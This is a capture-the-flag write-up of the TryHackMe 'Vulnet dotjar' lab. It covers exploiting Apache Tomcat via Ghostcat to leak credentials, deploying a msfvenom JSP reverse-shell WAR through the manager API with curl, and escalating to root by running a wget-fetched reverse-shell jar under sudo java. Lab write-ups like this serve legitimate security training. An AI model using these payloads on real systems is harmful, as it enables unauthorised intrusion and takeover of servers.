Vulnet dotjar Writeup (TryHackMe)

Bit Criminals Team

Type: Pentesting

Difficulty: Medium



Let’s start our daily routine nmap scan:

So, we get a 8009 port and a 8080 port on which Apache Tomcat is running.Well,the 8009 was new to me at least.

I then ran gobuster for port 8080 and here’s what I got

After searching a bit,I finally found a help from my bestie-Google.I found a article about a exploit named Ghostcat CVE-2020-1938.

Then,I searched for this exploit with searchsploit and look I found a python script:multiple/webapps/

Finally I ran the python script.

python <boxip>

and here we go.We get a username and a password webdev:Hgj3LA$02D$Fa@21.That’s what we wanted.

I tried to login to the /manager/ directory but it asked for username and password.I was able to login to /host-manager/ but it was of no help.

Then,again I started to look for some exploits to hack the Tomcat apache server running in port 8080 and google again prove it’s supremacy.

Reading this article I understood that we had to create a reverse shell and then upload it to port 8080. I also understood that the exploit must be a war file.Here’s what I came up with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=1234 -f war > shell.war

Then, I uploaded it with curl command as follows

curl -u 'webdev:Hgj3LA$02D$Fa@21' --upload-file shell.war  "http://ip:8080/manager/text/deploy?path=/monshell"

Listening to the given port,1234 as given in the exploit in this case,I opened the /monshell/ directory in which I had uploaded the shell.

And,yes we get a shell and I was logged in as ‘web’

After searching a bit we found a backup file of shadow in the /var/backups folder so we copied it to /tmp and gunzipped it to retrieve the shadow file.

Then we cracked the password hash for jdk-admin using john and logged in as jdk-admin

Now we can view the user flag..

After doing sudo -l we found that we have root permissions to run any java file.

So we created an exploit using msfvenom

msfvenom -p java/shell_reverse_tcp lhost=<local ip> lport=1234 -f jar -o pwn.jar

Then i opened a http-server and transferred the payload to the shell using wget

python3 -m http.server 80
wget <local ip>/pwn.jar --output-document=pwn.jar

And opened a listening port 1234 in my terminal and ran the .jar file in the shell.Thus we got the root access

sudo /usr/bin/java -jar pwn.jar

Now we can view the root flag as well!!